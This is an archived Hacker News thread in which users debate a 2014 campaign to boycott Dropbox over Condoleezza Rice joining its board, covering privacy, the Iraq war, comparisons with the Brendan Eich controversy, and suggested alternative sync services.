hacker news with inline top comments    .. more ..    14 Apr 2014 Best
home   ask   best   5 years ago   
Drop Dropbox drop-dropbox.com
1819 points by PhilipA  3 days ago   1005 comments top 182
grellas 3 days ago 59 replies      
Think about what it means to the HN culture to have a subject that normally would have been flagged out of existence as overtly political suddenly be featured front and center in the apparent belief that ideological purity is now a litmus test for who can serve on a board of directors in the startup world.

In a free society, people can unite in their business ventures even though they might be far apart in how they view the world generally. Startup culture thirty years ago had a decidedly American flavor. Today, it does not because the world is big and diverse and because entrepreneurs today who do startups come from all sorts of cultures and backgrounds. Surely, those who come from such divergent backgrounds hold differing political and religious views. Some are conservative, others liberal, still others apolitical. Some are theists, others atheists. The variations are many but one thing is certain: not all people think alike on political, religious, or social topics. These are issues that inherently will divide.

What happens, then, when people attempt to set political, social, or religious tests as criteria for who can hold important positions in a business organization? Well, it gets about as ugly as it can get, just as such tests proved ugly when used historically by, say, Christians to exclude Jews from holding important positions in society or to punish atheists for not holding to some prescribed creed.

One might say, "this is different" because we are not holding to an arbitrary creed but rather to fundamental principles that ought to govern all humanity. Well, that is precisely how those who sought to impose thought control in other eras rationalized their conduct. "Are you now or have you ever been a member of the Communist Party" is a question that destroyed many careers as the blacklists proliferated back in the 1950s. That was indeed a repulsive set of events by which many innocent persons were hurt and today our national conscience wishes it could take back the damage done to them.

So why is this any different? It is easy enough to whip oneself up into a lather over Ms. Rices policies if one disagrees with them but what about the half of America (or whatever significant percentage) that does not. And why should this be relevant to board service?

Politics, religion, and social worldviews divide people and have no place as limiting tests in a business environment. Scolding and finger-wagging was bad enough coming from a first-grade teacher trying to promote sanctimonious values back in the 1950s. Do we really want a counterpart agenda now setting rules for who can be a founder, who can be an investor, who can be a director, who can be a CEO, or who can otherwise take a prominent role in the startup world? The answer should be an emphatic no.

Principle is more important here than a particular outcome. What happens with Ms. Rice is not the issue here. What matters is upholding the abiding principle (precious in a free society) that people can hold divergent views on such topics as politics, religion, and society without being punished for their views in a business context. People can and ought to be able to unite to form great companies without having to compare notes on how they voted in the last election or some similar matter having nothing whatever to do with whether someone can add value to the venture. This is central to startup culture. Let us not lose sight of something so basic.

pvnick 3 days ago 36 replies      
I'm not sure how I feel about this. On the one hand, I absolutely agree with most of the opposition to Condi Rice wrt the illegal war, warrantless wiretaps, torture, etc. On the other hand, I threw a hissy fit over the opposition to Eich based on his beliefs. I'm not sure how I can oppose Rice while standing up for Eich without inconsistency.

Anybody else feel conflicted and have some insight? I'm still probably going to cancel my Dropbox membership simply because I have free 100gigs google drive that I got when I bought my chromebook [1] and this gives me a great excuse to transfer over and save some money. But I don't know that I can go on the same kind of crusade for which I faulted the Eich lynch mob.

[1] Free 100 gigs google drive when you buy a chromebook, which if you install crouton makes for a cheap, decently powerful linux machine (great deal!). I recommend the hp chromebook 14 with 4 gigs ram since it comes with free 200mb 4G tmobile internet every month for life.

netcan 3 days ago 8 replies      
I'm not American, so this is a little removed for me. In truth I don't really see big enough (non cosmetic) differences between the parties or administrations to justify the partisanship you guys seem to have.

What bother me here is not Condoleezza Rice specifically. Every ranking official of any country (or company) owns a big share of that country's sins and there are no "clean" administrations. Complicity is the price of admission and they all pay.

What does bother me is what this is a symptom of. Lets be honest about why board members are selected. Ex politicians wield political and corporate influence and a board seat is a way of renting that influence. At best its an elite club, at worst it's outright corruption but its always on that scale.

I guess that if pressed they would say that they bring experience and competence. That's as nonsensical as a large corporation justifying their political donations as an innocent, democratic expression of political preference. It's hard to say with a straight face.

Having ex politicians on a board is such a public display of stink. It's like when a politician who spends his entire life as a "civil servant" is obviously and publicly living a billionaire lifestyle with yhahts, mansions & private jets. They don't even bother to launder that dirty money. It's just displayed filth and all.

JackFr 3 days ago 10 replies      
Consider that when acting under uncertainty, intelligent, informed people of good will can examine the same set of facts and reach different conclusions.

It has become an article of faith that the Bush administration acted in bad faith about weapons of mass destruction in Iraq, while all that really has ever been shown is that they were tragically, woefully and extraordinarily wrong.

How intelligent, well educated people be so wrong, unless they were secretly evil? Groupthink for one, and in particular a failure to consider alternatives because of assumption of bad faith on the part of those who disagree with them.

I really don't care one way or another whether Condi is on the board of Dropbox or not, and I applaud you for refusing to do business with a company you believe is immoral. But I would be surprised (pleasantly) if this was a standard you were applying consistently, thoughtfully and evenly.

antonius 3 days ago 27 replies      
When looking to grow our board, we sought out a leader who could help us expand our global footprint.

Condoleezza sure left a global footprint in the Middle East alright. Hate do this Dropbox, but time for me to move on.

Edit: Suggestions for a Dropbox substitute?

dctoedt 3 days ago 11 replies      
I'm as anti-war as the next guy; we military veterans tend to be more so than most, and I've gotten even more so as I've gotten older. Still, there are those who appreciate that:

(A) political leaders aren't supermen and -women. Like all of us, they have to make the best decisions they can with the limited information available to them at the time;

(A1) [ADDED:] the signal-to-noise ratio can be problematic; the available bits of information are often of varying quality and sometimes are flatly contradictory --- a major part of the leadership challenge is figuring out what the hell is really going on;

(B) most political leaders genuinely want to do a good job, even if that's mixed in with a larger- or smaller dollop of self-interest (as is the case with most of us);

(C) in late 2002 and early 2003, memories of 9/11 were still raw;

(D) Saddam Hussein had irrefutably demonstrated that he was willing to use weapons of mass destruction in pursuit of his ambitions: he had used chemical weapons both on Iraqi Kurds and on Iranians (and let's not forget his brutal conquest of Kuwait);

(E) it was unclear to what extent Hussein had made any progress on building -- or buying -- nuclear weapons;

(F) the downside of a false negative on that issue was considerable; and

(G) hindsight is 20-20, and there are always Monday-morning quarterbacks around who are certain they could have done better.

tomasien 3 days ago 17 replies      
Dropping Mozilla because Eich is anti-gay-marriage made sense to me because Mozilla is the beacon of open source. Mozilla belongs to us in a very personal way, many of us have contributed code to Firefox personally.

But Condi Rice joining a completely private Dropbox as a board member - this is a non-issue. I'm as strongly anti-Bush administration and anti-war in general (especially the Iraq War - good grief) as anyone you could hope to meet, but this is ridiculously naive and short sighted to think that Condi being involved with Dropbox is something to get excited about. There are SO many people involved with private companies that are so much more partisan and support with no hesitation so many terrible things that if you want to go down this rabbit hole, you're going to be down there for a while my friends.

Edit: that Condi Rice is a "privacy" concern - ok. Fine. I think that's ridiculous but you know what - nothing is particularly ridiculous when it comes to privacy anymore. So I will accept that argument.

alandarev 3 days ago 0 replies      
The pictures on drop-dropbox sites are self-explanary and exponentally stronger, than common comments on why tech X shall be avoided I come across every day.

That is first time a "stop using tech X" site made me change my opinion.

Fully supporting. Those who are searching for alternatives - try out BitTorrent Sync. I have been using it for a while, will pull a plug on Dropbox acc.

jpwagner 3 days ago 3 replies      
I don't get this kind of stuff. I'm sure it's based on good intentions, but this will just lead to MORE nepotism and less transparency because the price of negative press is that much greater.

It feels similar to the hit on the Mozilla guy, which really rubbed me the wrong way. For all I know he clubs baby seals in his free time, but nobody bothered to investigate the truth until it was too late.

One individual or group, finally crawling out of being persecuted, deciding to persecute another is just plain disgusting.

cmiles74 3 days ago 0 replies      
To my mind, the most relevant issue here is that someone asked Rice something along the lines of "Should we illegally wiretap these people" and Rice then said "Yes." It seems clear that she believes the government, law enforcement, etc. should have access to whatever data they feel that they need.

With her on the board of Dropbox, it seems reasonable to fear that she'll err on the side of providing data to government and law enforcement rather than fighting to keep Dropbox data private. This alone strikes me as a good reason to want her off the board and, consequently, to move to another product.

I don't see this as being a direct parallel to the issues around Eich and Mozilla. In that situation, many people didn't feel that his personal beliefs and personal behavior would materially effect the quality of Firefox or it's feature set. In this case, it seems we're talking about almost the opposite situation: wondering how a person's past professional behavior and views they publicly held while in their past professional roles might effect their decisions in their new business role.

bicx 3 days ago 5 replies      
Unless a company is actively hurting people, I'm going to choose what I use based on the quality of the product, not on a board member's past. Maybe they determined that a hardened political voice would balance them out in the boardroom. Maybe they need someone there to play the devil's advocate in an industry that can be extraordinarily narcissistic.
fennecfoxen 3 days ago 2 replies      
Allow me to quote (gay rights activist) Andrew Sullivan, via The Economist, over the Eich issue. I think it mostly applies here -- http://www.economist.com/blogs/democracyinamerica/2014/04/to...

"The ability to work alongside or for people with whom we have a deep political disagreement is not a minor issue in a liberal society. It is a core foundation of toleration. We either develop the ability to tolerate those with whom we deeply disagree, or liberal society is basically impossible. Civil conversation becomes culture war; arguments and reason cede to emotion and anger."

Also available at above link: select quotations from John Locke.


Postscript. Oh, of course I'm going to be modded down for this. Civil conversation has been replaced with culture war. Well, maybe not culture war, but a close analogue. :P

hawkharris 3 days ago 2 replies      
The Chevron example came out of left-field. While the other sections focused on actions or positions that Rice had taken, the Chevron anecdote would have us believe that Rice is an unethical person simply because she had a relationship with the company.

This is one of many unfair generalizations about energy companies. In reality, Chevron is one of the greatest contributors to alternative energy research. Without it and ExxonMobil, there wouldn't have been half as much progress toward sustainable power.

ebiester 3 days ago 0 replies      
Within the progressive community, and other activist communities from all sides (in and out of the US), there is a line of thinking that individuals should actively seek to do business with companies that share their values, use neutral companies when avoidable, and endure discomfort before using products of companies actively doing evil.

I think that before we can discuss the "hypocrisy" of this versus Mozilla, or of the merit of such protests, we should first ask ourselves whether we agree with the above statement as part of our core values.

After that, we can discuss what actions line up within the three categories, and if the actions of the company are equivalent to the actions of the leadership.

To me, the Iraq issue is important, but it is not as important to me as my right to be a first class citizen of this society. My friends who work on the issue would have a different perspective.

Thus, to me, this is a warning indicator that Dropbox may not align with my values, and is worth investigating, but isn't worth making a quick decision. That said, I felt the same way about Mozilla.

Many of the comments that I've seen here are indirectly addressing this issue, but I think this is a value proposition that we each have to make within ourselves first.

beaker52 3 days ago 0 replies      
Even if Rice goes, I'm not going back. The board has already shown it's ugly face.

No amount of backtracking will convince me I didn't see what just happened.

Zikes 3 days ago 1 reply      
Come on everyone, if we work together we can get Condy fired just like we did Brendan Eich!
joemaller1 3 days ago 5 replies      
I was wondering how long this would take. Thoughtcrime is here. The quest for ideological purity is kneecapping our future. Shutting out half of the brainpool because they hold opposing views about disconnected topics is a recipe for societal failure.
avenger123 3 days ago 0 replies      
I am sure this has been brought up already.

Why would a company that can store people's potentially most sensitive documents want to bring someone on board that directly or indirectly was a part of shaping the NSA programs?

That boggles my mind. How does the conversation go in this situation? "Hey, we don't leak your information but guess what, we just brought someone on our board that fully believes taking a peek at your documents is A OK and was involved with making sure the government could take a look."

That to me is a bit mind boggling.

grandalf 3 days ago 0 replies      
I am also fairly disappointed by this news. Rice was complicit in the Bush administration's war crimes and crimes against humanity. She also led the propaganda effort to dehumanize the Iraqi people in the minds of intellectuals.

It's a very strange feeling of disappointment... as if something precious, Silicon Valley innovation, talent, success, can somehow not succeed without the blessing/involvement/connections of government officials.

This definitely makes me question the ethics of Dropbox as a company.

This is not about politics at all, war crimes are clearly defined. FWIW Obama has also committed many and I'd be equally disappointed if he or one of his top warmongers was added to the Dropbox board.

alecco 3 days ago 1 reply      
Dropbox board and CEO decided this was a good move. They know it will alienate the original userbase, the tech savy, the first movers. In exchange they'll access old money, the old school corporations and government agencies.

They decided to screw the current userbase for a new userbase. It's over, just get over it. The maximum you can do now is refuse to use Dropbox.

It's sad how tech is getting to a cycle of befriend-and-switch on the community. This will surely make people more cynical and will make it much harder for upcoming startups. This is the highest cost we'll pay about this new trend.

aioprisan 3 days ago 6 replies      
Weren't John Kerry and Hillary Clinton arguably equally responsible for any war that Condy supported? The voted for the funds that made it possible, how is that less responsible for the results?
ep103 3 days ago 1 reply      
Bittorrent sync is actually an amazing dropbox replacement, and actually has a number of really good privacy implementations built in from the start. I'd highly recommend it, if anyone sees this comment.
wambotron 3 days ago 2 replies      
I don't care if people are of a different belief system than I am as long as they don't directly lead to the deaths of thousands of people.

I think the Eich situation was crazy for sure, but I didn't boycott Mozilla (.. although I don't really use anything from them to begin with). I did delete dropbox, however. I don't want anything to do with Rice.

it_learnses 3 days ago 0 replies      
These are exciting times! Companies and their leaders are actually being held accountable directly by the people for their unethical, immoral behaviours by diverting their business elsewhere. It's amazing to know that so many in the tech industry care about these issues.
davexunit 3 days ago 1 reply      
Finally people realize that Dropbox is unethical. They've been denying your computing freedom for years now, but it took hiring Condoleezza Rice for people to start to catch on.

Replace dropbox with ownCloud. http://owncloud.org/

bachback 3 days ago 3 replies      
I'd suggest the alternative http://mega.co.nz
atmosx 3 days ago 0 replies      
Just did actually. Was it easier that I originally thought. I was about to start using 'Google drive' but I'll try handle my staff off-line first, then see how this plays out.

There are things I don't mind keeping online, Google drive comes handy because I work with 2 macs and a chromebook.

But I will take some time and review my options before proceeding. Here are some hints for others looking for another service:

* Wuala: Servers in Switzerland, owned by Lacy, iPhone/Android/Mobile Windows clients ready.

* SpiderOak: Everything should be encrypted (servers in the US though). Don't know about mobile integration but I guess it's there

* Google Cloud: Nice if you don't mind Google having your files.

* OwnCloud: For to be considered secure, you need a VPS (~100 USD/year) + OpenSSL certificate + time to set-it-up and manage the VPS. Has mobile clients.

I'm closer to Google Cloud for the time being..

KhalPanda 3 days ago 0 replies      
Yeah... or I could continue using Dropbox as I have done for the past couple of years safe in the knowledge that a director's political background has little-to-nothing to do with the day-to-day running of a tech company.
ptbello 3 days ago 0 replies      
Just delete your account already instead of tweeting empty promises


Reason: Other

Care to elaborate: Condoleezza Rice

ewindisch 3 days ago 0 replies      
The fact is that the IC (Intelligence Community) has infiltrated most companies of strategic intelligence value. That's not really up for debate. However, it's also clandestine and presumably against the foreknowledge of the infiltrated companies. While as user, these actions are concerning, it's understandable that infiltrated companies may not be willing divulging their customer's data. While it's easy to point fingers, I'm willing to look beyond a certain amount of corporate ignorance stemming from a pre-Snowden world.

In a post-Snowden world, continued ignorance of embedded security assets in the corporate infrastructure is no longer acceptable. I say this with some hesitation, as I'm friends with several such assets and wish no ill will toward them as individuals. Yet, it cannot be ignored that companies should be expected to limit their trust of those whom have sworn oaths in conflict with their corporate interests, especially when their actions have spoken louder than their words.

Condolezza Rice has repeatedly shown that her interests lie too close to the agenda of the Intelligence Community and are at conflict with the expectations of security and privacy that I expect of a service such as Dropbox.

This is what I told Dropbox when I deleted my account.

valarauca1 3 days ago 0 replies      
Lucky business has an even more effective system. If you like a company/its product pay for it. If not don't. I'm voting with my wallet.
walden42 3 days ago 0 replies      
Spider Oak is great, and cares about your privacy. Everything's encrypted client-side.
ixmatus 3 days ago 0 replies      
I'm moving over to BtSync ASAP; I really wish there was a Tarsnap like service but synced my data across multiple devices :( I can only really use it for backups...
joyeuse6701 3 days ago 0 replies      
Hah, you know, back in the day, when people had a problem with a political action it usually ended up in a serious sacrifice e.g. seppuku, self-immolation, revolt, crucifixion... guillotines, assasinations. Nowadays one can disagree vehemently with a leader just as before, but simply stop using a service related to them to help with some passive aggressive need of absolution from the shame you somehow internalized! Grand. Absolutely. Grand. I mean, sure if you have an issue with the deaths this woman is tied to...DEATHS, you know, for emphasis, you'd think that that would have been the last straw, that you would have given up your citizenship and moved elsewhere in at least some sign of protest against the U.S. Government as a Service. But no, this...this is the last straw, because now you can 'fight' her on your terms that won't hurt you too bad, show the world your 'mettle'. The sacrifice is symbolic enough you can tell your friends about it, but not so much that it actually hurts you, which really isn't a sacrifice at all. All you can do here is express an opinion, and change your money flow, which really doesn't alter anything, you've stalemated the battle, but the war is still lost.
macca321 3 days ago 0 replies      
Boom. Downgraded my account to free. Now I have 8 months to accept OneDrive into my life.

It feels quite empowering to have the ability to protest the Iraq war with my wallet, more so than not voting Labour did.

tommo123 3 days ago 0 replies      
A lot of people here seem to have absolutely no issue with saying "I have no problem with the ethical ramifications of a company's actions or choice of representatives or the beneficiaries of a company's wealth that my support helps grow". I can't tell if you're sociopathic or just utterly clueless. Not taking a 'moral stand' isn't business -- it's taking a moral stand of not caring. Culpability can stem from inaction as well.
dzink 3 days ago 1 reply      
A board member does not decide on features or dig into your account to look for your political preferences. I can think of a dozen reasons why they would have invited her and all of them would be good for the company and good for users:

- advise on security matters and help keep the NSA out of my files.

- get government business for Dropbox thus maybe reducing bureaucracy for citizens and small business owners alike in this country and others.

- help the company navigate Washington in a lot of ways

My imagination is poor on the subject, but I think if a company gets a politically savvy partner who was chief diplomat in the most powerful country in the world for a while it is for the benefit of the company and it's users.

mcherm 3 days ago 2 replies      
Attacking companies for working with leaders who happen to have a conservative political viewpoint is simply unacceptable.

For goodness sake, Condoleezza Rice was the US Secretary of State! There are a substantial number of people who found her to be an excellent leader -- including at least 2/3 of the US Senate.

I am quite liberal, but I do not believe in blacklisting people because of their political beliefs. At one point, this country blacklisted "Communists" because of their beliefs -- it was not enforced directly by the government, but the blacklisting was nevertheless quite real. Let us not recreate that sad chapter in our history with "Conservatives" replacing the "Communists".

estebanrules 3 days ago 0 replies      
I'm floored by this news, and extremely disappointed with Dropbox. From the beginning I have been a huge proponent of Dropbox. I was lucky enough to get a free 50 GB account, and I use it for probably 30+ daily automated tasks. I will absolutely not be using Dropbox for any reason whatsoever if she remains on the board...I'm going to wait a week and see if they remove her and if not, bye bye.
cscheid 3 days ago 0 replies      
Does anyone know of a version of http://theyrule.net with updated data?
ajsharp 3 days ago 1 reply      
This is just silly.
ep103 3 days ago 0 replies      
Bittorrent share is actually an amazing dropbox replacement, and actually has a number of really good privacy implementations built in from the start. I'd highly recommend it, if anyone sees this comment.
sfk 3 days ago 0 replies      
Comparing this voicing of disapproval to Mc Carthyism is completely disingenuous, and I'm surprised that you do not know better.

In the 1950s it was the government who harassed innocent citizens. You cannot escape the government, because it has absolute power.

What we are seeing here on the other hand is a peaceful protest of free citizens exercising their right to free speech.

edlebert 3 days ago 0 replies      
Keep those torches lit for everyone in the current administration too, right? Torture, war, and mass-surveillance continue to this day, 5 years after she stopped being Secretary of State. In addition, many in the current administration were involved in the Iraq war as well.
brudgers 3 days ago 0 replies      
The most positive aspect of Rice's appointment is that it is a clear signal as to how DropBox is likely to act when evaluating claims that a particular course of action will affect the United State's national security interests as those interests have been defined in recent years. It expresses that DropBox's operations are likely to be in accord with a particular interpretation of American patriotism.

Whether one as an American agrees with that interpretation of American patriotism or holds an orthogonal view, or whether a non-American sees that interpretation as right or not, individuals will now be able to make an informed choice about if, when, and how they use DropBox. There should be no wishful thinking, DropBox has declared itself part of the American military-industrial complex.

Such honesty is refreshing irrespective of my opinion regarding the nature of patriotism or what constitutes superior forms of its expression.

mentos 3 days ago 1 reply      
>Tell Drew Houston: drop Condoleezza Rice or we will

So if they drop Condoleezza Rice you'll be fine with their decision making process and keep your dropbox account?

kayoone 3 days ago 1 reply      
How Dropbox could possibly not expect a shitstorm like this is beyond me.
jalfresi 3 days ago 0 replies      
(With apologies to Zed Shaw, I am just using him as a high profile example)

Zed Shaw can be an asshole. But that guy can sure sling code, and I'll eat up anything he programs. Hire him as CEO of a large public company? Now we have a problem...

Brendan Eich actively opposes gay marriage. But he programs at Netscape and invents Javascript. Love the guys work. Hire him as CEO? Now we have a problem...

Hopefully this shows that the responsibilities at different levels within a business have differing impacts on society. So what if Zed Shaw is an asshole as a software developer? At that level he lacks the political clout to negatively impact society on such a large scale. We can then see that his short temper and sometimes vicious (and often hilarious) barbs are confined in reach. But what if he was President of the United States, sat in a room with Putin, discussing the Ukrane situation? Diplomacy may suffer.

This is why I had a problem with Eich as CEO of Mozilla. His backwards political views would have the political clout and mechanisms to negatively impact society.

As for Rice being appointed to Dropbox? I simply do not trust someone who has been shown to lie for political ends, to the point of invasion of a soverign nation and promote, participate in and endorse war crimes. I require COMPLETE TRUST in any data storage provider I use and as such deleted my dropbox account.

Deusdies 3 days ago 2 replies      
I have generally been using Google Drive anyway, but after what this person did to my country as well, I am not going to support a company that supports her.

Time to move all of my files from Dropbox to GDrive.

krick 3 days ago 0 replies      
I don't know who author of that mentions by saying "we", but I somehow don't feel I should respond to his call. I don't even really know who is that woman he is speaking about, I don't know about politics, I don't want to know. I can't even recall without googling who's running Dropbox right now and I surely don't know (I wonder if I could!) if they are good or bad people. I know Dropbox. Dropbox is a service that does something valuable to me. So, why should I be concerned?

I could be concerned if author explained me why and how is that Dropbox does something "bad". If it'd show that it will hurt customers or dolphins or whatever. I surely would be concerned if it'd show that there's no way we can trust Dropbox anymore because of that. But if it would be so I don't think I should trust them anyway, because, you know, Condoleezza Rice doesn't fall from the sky right in the directors chair usually, she's invited first. They are already connected somehow.

But manifesting some organization (that does something useful, which rarely the manifesting ones do) because of some woman-who-supported-war (or man-who-is-against-gay-marriages, for that sake) is sitting the hight chair in it is stupid. I don't think I could use anything if I protested about every company having some personality I disagree with in its owners/directors list (however their names may be somewhat less known than "Condoleezza Rice").

And if you want to hurt that Rice specifically for some reason too bad, but I don't think that's big problem for her. I believe she has money to avoid dying of starvation anyway already.

huntleydavis 3 days ago 0 replies      
I think it's safe to say that when a tech company reaches a certain size, especially ones that have a substantial amount of user data, it's impossible to be politically neutral on the war on data. If a company doesn't outright say where there position lies, it will come out in the leadership actions that are taken. I agree with this opposition against Dropbox because a company like Dropbox has to adamantly say, both with words and actions, that they are in favor of data privacy. Without this strong declaration, I can't do anything but assume that their integrity in regards to data privacy is weak or that they are outright in favor of exposing sensitive data in exchange for powerful partnerships.
captainmojo 3 days ago 0 replies      
I don't feel this site goes far enough. As someone who values privacy, I feel I've already been slighted with this decision, and I don't plan on forgiving Dropbox for it if they change their mind. I'm cancelling my paid subscription this weekend.
stephengillie 3 days ago 1 reply      
I was expecting to see this response for their lacking reaction to Heartbleed, not to having Rice join their board...
vishalzone2002 3 days ago 0 replies      
its not only dropbox. She is also on board of multiple class-A valley startups including thomas siebel's c3 energy http://www.c3energy.com/about-board-of-directors
Zelphyr 3 days ago 0 replies      
For those comparing this to the ouster of Brendan Eich: It seems to me there is a distinction in that he, despite his ignorant views, was able to keep them separate from his work.

Making this country less free and more war-like (e.g.; less safe) WAS her work and she did it all too well. Her ties to the NSA alone are serious cause for concern. Do we really want someone in a position of power at a place that stores massive amounts of (supposedly) private user data?

I already removed 99.9% of my data from Dropbox after the NSA revelations with the assumption that the latter had access regardless of whether Dropbox was complicit. I assumed they weren't. With former Secretary Rice on the board I now assume Dropbox will become complicit and so I will delete my account altogether.

jader201 3 days ago 0 replies      
I see shades of gray all over the present and future of this thread. Pretty sure if there were ever an appropriate thread for enabling pending comments [1], it is this one.

[1] https://news.ycombinator.com/item?id=7484304

morgante 3 days ago 0 replies      
I wholeheartedly agree with this cause, but think the framing is terrible. It's clouding the picture by making things political when they don't need to be.

Rice's support of the Iraq war does not matter. Dropbox will not be starting wars or having anything to do with them, besides possibly getting lucrative DoD contracts.

Rice's position on torture does not matter. Dropbox has no reason or likelihood of torture.

Rice's involvement with Chevron does not matter. If anything, this is evidence that she might be an okay choice.

The only thing which matters is her position on warrantless wiretapping. It's not political. I'm just not comfortable having someone make key privacy decisions who, on the record, doesn't believe in my right to privacy.

Even if (bizarrely) you think mass surveillance might be acceptable, you should oppose Rice being on the board. Our system works best when there's an adversarial relationship between actorswhen the government comes knocking, corporations will at least ask a couple questions about why, even just to verify this is a legitimate government request. Having someone who designed, and firmly believes in, the surveillance state on BOTH sides of the table destroys that.

So, yes, drop Dropbox.

cschmidt 3 days ago 0 replies      
Her 9 page CV is here:


From that she is currently on the corporate boards of KiOR, C3 Energy, and Makena Capital. She previously was on the boards of Schwab, Chevron, Transamerica, and HP.

mattmaroon 3 days ago 0 replies      
I love how it says it's not because she was a member of the Bush Administration and not partisan, then goes on to list a bunch of things she did as a member of the Bush Administration.
pdpi 3 days ago 2 replies      
I feel that at this point we might to coin the verb "to eich", meaning "to shitstorm a company into forcing a high-ranking manager to resign".
micahroberson 3 days ago 0 replies      
Aside from personal views, I question why Dropbox would make a move like this knowing that there would some backlash at the very minimum. There are other people out there that would make just as good of a board member without the potential that Condi has for stirring up discontent. If they didn't anticipate this or consider the ramifications of adding Condi, then the execs behind the decision need some help.
cjoh 3 days ago 1 reply      
While I wish people took more moral stances like this, I feel like it's nonsensical to worry about Condi Rice, and worry more about the broken incentives around the financial system that Dropbox is headed for. Goldman Sachs is a substantial investor in Dropbox. Where were the cries to drop dropbox then?


Or the ideology "fiduciary responsibility" for public companies, which involve companies like Google and Apple hoarding money offshore and using sophisticated accounting tricks to avoid paying taxes?

I'd like to see more of our "I AM OUTRAGED" efforts be aimed more towards the systems that cause our problems than the people who arise from them.

jimmytidey 3 days ago 0 replies      
It makes it easier that I don't really like Dropbox as a product anyway.
shittyanalogy 3 days ago 0 replies      
Just remember; Dropbox is convenient, and with that convenience come Condoleezza Rice having possession of your data.
bagels 3 days ago 1 reply      
I read through the whole site... where are the instructions on deleting a Dropbox account?

Not that it was very hard, but the link is non obvious in the Dropbox account settings, spent a couple more minutes than I'd like.

For those interested, this is a link from the support page:


shiftpgdn 3 days ago 0 replies      
Kind of wish there was a picture of dead kids warning before I clicked the link.
edtechdev 3 days ago 0 replies      
I've been looking for an excuse to finally copy over my stuff from dropbox to google drive, thanks, I was too lazy to bother with it before :)
CamperBob2 3 days ago 0 replies      
The link to http://www.foxnews.com/politics/2009/04/22/bush-adviser-rice... is broken on the page. There's no contact link to the drop-dropbox.com admins, so maybe they'll see it here...
dinduks 3 days ago 0 replies      
I find it surprising that people are so desperate they beg the Dropbox company and still want to use the software after this.

1) You CAN live without Dropbox. There are alternatives (I personally use BTSync, which is great). 2) You shouldn't NOT be using an American service that holds and versions your data in first place. It is not new that all these services are wiretrapped, or at least easily accessible by the gov (not mentioning they sell/use your privacy to make money). 3) They won't kick out such an "extremely brilliant and accomplished individual". 4) Even if she gets kicked or leaves, this is yet another reason to not trust them, since they're blind/careless enough to hire her.

thesis 3 days ago 0 replies      
I've kind of been waiting for a reason to switch to Google Drive because of (mainly) price and a few other factors. While not the main reason, this is the tip of the iceberg.
whizzkid 3 days ago 0 replies      
This is like being in the same boat with someone that caused a massive amount of people's life. Maybe that person has nothing against to you, or harmed you, and she can even be a the perfect captain for the boat.

But personally, If i have the option of another boat to board on, I would rather not be on the same one with her.

jmnicolas 3 days ago 0 replies      
I just closed my DropBox account with the reason "Condoleezza Rice". I want those people to know there are consequences to their actions.

Now if I was rational about it and it was as easy as living without DropBox, I would stop using Microsoft softwares.

mkhalil 3 days ago 0 replies      
I am happy to hear more people understanding the notion that every dollar you spend is a vote. No matter what one may believe, being ignorant to the fact that business and politics have a lot to do with each other does not make you innocent. Spend your dollars responsibly. In fact, I'd even go as far to say that the way people spend their money can impact their government/politics/society in a much more drastic way than voting in the booths.

Rice was a war monger. She broke many laws-including international laws which we tend to throw out of the way when it comes to us-that were put in to protect us, the people. You think politicians don't choose their which business they invest in based on politics of people involved think again.

We need to change the way we spend our real vote, money, if we want real reform in our society. We need to show our influence and have politicians think again before passing the next SOPA act, or invading our privacy.

tambourine_man 3 days ago 0 replies      
The only real alternative is building your own. I have, it was fun and it mostly works.

But suggesting that Box.com, Microsoft or Google are more trustworthy is misleading.

beggi 3 days ago 0 replies      
I dropped Dropbox about a year ago, after realizing I only used it for backups. Although a nice feature in idea I actually never accessed my files on other computers, so I dropped Dropbox and switched to Arq backups. I recommend it for anyone with the same dilemma.
nextstep 3 days ago 0 replies      
Ok, I agree with most of this. What is the best Dropbox alternative?
dkhenry 3 days ago 1 reply      
Well I thought it would take longer for activists to start targeting companies in the wake of the Mozilla issue. I am actually surprised to see this happen so quickly. Its good to know that I am free to excersize my rights unless I want a job in the tech sector in which case I am required to conform to the social worldview of a selection of internet activists.
Rofu2000 3 days ago 0 replies      
I approve of any thought process that allows me to narrow down the amount of awesome cloud services out there to choose from. Making choices is really hard for me. Also, I prefer ethical reasons because it makes me feel warm at night.
gress 3 days ago 0 replies      
This is a great way to express political opinion in a capitalist society where the ballot box is ineffectual. I hope we see more of it.
BetterLateThan 3 days ago 0 replies      
1. Uninstalled. 2. In 2014, every business faces the choice to either quit businessing or collaborate with the government. This choice will soon trickle to individuals, if Rome, Germany and the USSR are any reference.
Mindless2112 3 days ago 2 replies      
First Mozilla for Brenden Eich and now Dropbox for Condoleezza Rice -- is this what Hacker News is now? a tool for the Internet lynch mob? Disgusting.

"First they came for the Socialists, and I did not speak out-- Because I was not a Socialist.Then they came for the Trade Unionists, and I did not speak out-- Because I was not a Trade Unionist.Then they came for the Jews, and I did not speak out-- Because I was not a Jew.Then they came for me--and there was no one left to speak for me." [1]

Some will say "But Dropbox/Condoleezza Rice is no victim here! They're just reaping the results of their actions." But that's exactly the point, isn't it: it's all fair until the Internet mob turns on you for something you've done that they don't approve of.

I'm not saying I approve of Condoleezza Rice being on the Board at Dropbox, but using HN for this sort of activism disgusts me.

[1] http://en.wikipedia.org/wiki/First_they_came_....

taksintik 3 days ago 1 reply      
Very troubling hire. Very bad pr move by Dropbox.I relly don'why they would choose such a polarizing person.
infra178 3 days ago 0 replies      
> This is not an issue of partisanship.

That's exactly what it is.

msoad 3 days ago 0 replies      
I'm from Middle East. I can't be the one who make Ms. Rice richer and happier. Goodbye Dropbox.
mschuster91 3 days ago 0 replies      
Recommend Google Drive and MS OneDrive? As if those two were any better. Google mines your data and MS sleeps with the NSA.
MrBlue 3 days ago 1 reply      
sudo apt-get remove dropbox; rm -rvf ~/.dropbox ~/.dropbox-dist


amcnett 3 days ago 1 reply      
All this time I thought the line item reading "roll my own dropbox clone with a raspberry pi or something" on my Someday Maybe Projects list might always stay buried low on the stank rank.

Then this news broke. My personal digital exodus has commenced. Best not to wait until she conveys the authorization of Dropbox's administration to submit user data and activity in a privacy-flouting fashion.

"The president instructed us that nothing we would do would be outside of our obligations, legal obligations, under the Convention Against Torture," she replied. "So that's -- and by the way, I didn't authorize anything. I conveyed the authorization of the administration to the agency . . .By definition, if it was authorized by the president, it did not violate our obligations under the Conventions Against Torture." - http://www.huffingtonpost.com/phil-trounstine/stanford-anti-...

Ryel 3 days ago 0 replies      
It sounds like Dropbox is giving the middle finger to everyday consumers and this is simply a move to get Dropbox on every government machine.
homulilly 3 days ago 0 replies      
Dropbox has made it pretty clear in the past that security and privacy isn't a major priority for them and this appointment makes it even more obvious.

